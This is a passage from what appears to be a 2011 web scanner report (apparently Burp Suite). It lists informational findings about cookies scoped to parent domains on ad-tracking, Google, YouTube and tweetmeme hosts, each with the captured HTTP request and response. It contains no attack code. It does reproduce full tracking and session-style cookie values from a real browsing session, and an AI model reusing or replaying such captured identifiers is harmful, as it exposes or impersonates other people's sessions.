Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=ImC9hZaqf6E15jeFXzHEta1bUFSlTGsgCRWHYp2n3g=uRYxxjtBwki2Qqjt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=yThlFMrnGBFw9FkRw3x0I7VYQdh_YKYEC0XnuKxC8A=O5FCzgMvUYm0AvQP; expires=Tue, 26-Jul-2011 22:19:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 24 Jan 2011 22:19:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.101. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
rdrlst=20z0so2ylebnns0000000h0o03050310g7dpletz4d0000000d0o03050310d10flfk1rn000000020o020502102mmnlebnns0000000h0o03050310g10elfk1rn000000020o020502102x1blebnns0000000h0o03050310gxo1lebnns0000000h0o03050310geh5lf17qf000000090o0305031096bylemlne0000000f0o03050310fw3clebnns0000000h0o03050310g7gmlebnns0000000h0o03050310gjv6lebnns0000000h0o03050310gj4ilew2e20000000b0o03050310bxthlebnns0000000h0o03050310gfullf8gij000000050o0305031050c9lfk1rn000000020o020502102jillebnns0000000h0o03050310gfuqlegh2b0000000g0o03050310gb6mlf17qk000000080o030503108mz1lebnns0000000h0o03050310gcajlfk1rn000000020o020502102p7vlebnns0000000h0o03050310g7vglfk1rn000000020o020502102xvslebnns0000000h0o03050310g10rlfjpei000000030o030503103xuklebnns0000000h0o03050310gjk7lebnns0000000h0o03050310gx1jlebnns0000000h0o03050310gyiplebnns0000000h0o03050310gcbnlfk1rn000000020o020502102xwflebnns0000000h0o03050310gyh0lebnns0000000h0o03050310ge4vlebnns0000000h0o03050310gxwblebnns0000000h0o03050310gjwblfk1rn000000020o020502102; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000070o03050310782gletz4d0pqa500a0l000400100ag2leqh190tm3600e0o03050310e82hlebnns181qq00h0o03050310g9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000030o030503103820lebnns181qq00e0l000400100b0olfjpei000000030o030503103ab4lebnns181qq00h0o03050310g9szlebnns181qq00h0o03050310g8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13m2400g0o03050310gal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000030o0305031038bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000030o03050310340slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000040o03050310440uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=4845 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; orblb=2lfk1rn012dh10u0100000; rdrlst=2110s7dpletz4d0000000c0o02050210co2ylebnns0000000g0o02050210f10elfk1rn000000010o010501101mmnlebnns0000000g0o02050210fxo1lebnns0000000g0o02050210fx1blebnns0000000g0o02050210feh5lf17qf000000080o0205021086bylemlne0000000e0o02050210ew3clebnns0000000g0o02050210f7gmlebnns0000000g0o02050210fjv6lebnns0000000g0o02050210fj4ilew2e20000000a0o02050210axthlebnns0000000g0o02050210ffullf8gij000000040o02050210410flfk1rn000000010o0105011010c9lfk1rn000000010o010501101jillebnns0000000g0o02050210ffuqlegh2b0000000f0o02050210fb6mlf17qk000000070o020502107mz1lebnns0000000g0o02050210fcajlfk1rn000000010o010501101p7vlebnns0000000g0o02050210f7vglfk1rn000000010o010501101xvslebnns0000000g0o02050210f10elfk1rn000000010o01050110110rlfjpei000000020o020502102xuklebnns0000000g0o02050210fx1jlebnns0000000g0o02050210fjk7lebnns0000000g0o02050210fcbnlfk1rn000000010o010501101yiplebnns0000000g0o02050210fyh0lebnns0000000g0o02050210fxwflebnns0000000g0o02050210fe4vlebnns0000000g0o02050210f10elfk1rn000000010o010501101jwblfk1rn000000010o010501101xwblebnns0000000g0o02050210f; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: rdrlst=20z0so2ylebnns0000000h0o03050310g7dpletz4d0000000d0o03050310d10flfk1rn000000020o020502102mmnlebnns0000000h0o03050310g10elfk1rn000000020o020502102x1blebnns0000000h0o03050310gxo1lebnns0000000h0o03050310geh5lf17qf000000090o0305031096bylemlne0000000f0o03050310fw3clebnns0000000h0o03050310g7gmlebnns0000000h0o03050310gjv6lebnns0000000h0o03050310gj4ilew2e20000000b0o03050310bxthlebnns0000000h0o03050310gfullf8gij000000050o0305031050c9lfk1rn000000020o020502102jillebnns0000000h0o03050310gfuqlegh2b0000000g0o03050310gb6mlf17qk000000080o030503108mz1lebnns0000000h0o03050310gcajlfk1rn000000020o020502102p7vlebnns0000000h0o03050310g7vglfk1rn000000020o020502102xvslebnns0000000h0o03050310g10rlfjpei000000030o030503103xuklebnns0000000h0o03050310gjk7lebnns0000000h0o03050310gx1jlebnns0000000h0o03050310gyiplebnns0000000h0o03050310gcbnlfk1rn000000020o020502102xwflebnns0000000h0o03050310gyh0lebnns0000000h0o03050310ge4vlebnns0000000h0o03050310gxwblebnns0000000h0o03050310gjwblfk1rn000000020o020502102; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000070o03050310782gletz4d0pqa500a0l000400100ag2leqh190tm3600e0o03050310e82hlebnns181qq00h0o03050310g9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000030o030503103820lebnns181qq00e0l000400100b0olfjpei000000030o030503103ab4lebnns181qq00h0o03050310g9szlebnns181qq00h0o03050310g8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13m2400g0o03050310gal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000030o0305031038bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000030o03050310340slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000040o03050310440uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv
Content-Length: 0
Date: Tue, 25 Jan 2011 02:05:02 GMT

13.102. http://il.youtube.com/watch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://il.youtube.com
Path:	/watch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: il.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 22:36:38 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
Set-Cookie: GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fil.youtube.com%2Fwatch&ytsession=9CCes4D_KlNIl7SiPulxyCata5FvenJFf1wQWKCp1FfowW4Ruca5frrRInIZHQDHadMY2zzc7eC949j37txZqBMfbtlMX76yyqg5YaUJdpArzok6qvSJGE2qJmTQ9us2_jirFmCfOuioCIHWzOYfDjeH5EK1C8wyNCA6uBNcN2zBzk-rtHd9cUnRz_cypFXxyGkfU6vqIN2wK124Rc1nHvt5kfu7275zZvGpAhvL8mAbr918TS_LFBmxlw8xwHA5YsyHQat_Or43vMW4bg-eXOa17nSCXUzcfvry5x_x-4tgaww7-soXyA
Connection: close

13.103. http://images.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/images

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
NID=43=mcWAgK1ANMXxEaYpa4k28PPWxEgiMiXMY9JyNAZAwpdg3u-yZ4eQip59-1LTLikEZX9_Vg6M2deQCgacPaIumRuV0AAahKaZM3THMQhm32QzECiAxEpv3mwYDylZXsml; expires=Wed, 27-Jul-2011 15:05:42 GMT; path=/; domain=.google.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://images.google.com/imghp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=mcWAgK1ANMXxEaYpa4k28PPWxEgiMiXMY9JyNAZAwpdg3u-yZ4eQip59-1LTLikEZX9_Vg6M2deQCgacPaIumRuV0AAahKaZM3THMQhm32QzECiAxEpv3mwYDylZXsml; expires=Wed, 27-Jul-2011 15:05:42 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 25 Jan 2011 15:05:42 GMT
Server: gws
Content-Length: 227
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://images.google.com/imghp">
...[SNIP]...

13.104. http://iphone.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://iphone.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:55 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0074069499969482
X-Served-In: 0.058972120285034
X-Served-By: h01
Content-Length: 42596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.105. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K04491 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/
Last-Modified: Mon, 24 Jan 2011 21:06:41 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 24 Jan 2011 22:06:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 21:06:41 GMT
Content-Length: 5862

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'K04491';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

13.106. http://justinbieber.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://justinbieber.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 16:26:48 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.013036966323853
X-Served-In: 0.72553992271423
X-Served-By: ded2061
Content-Length: 42518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.107. http://k.collective-media.net/cmadj/cm.martini/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.martini/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

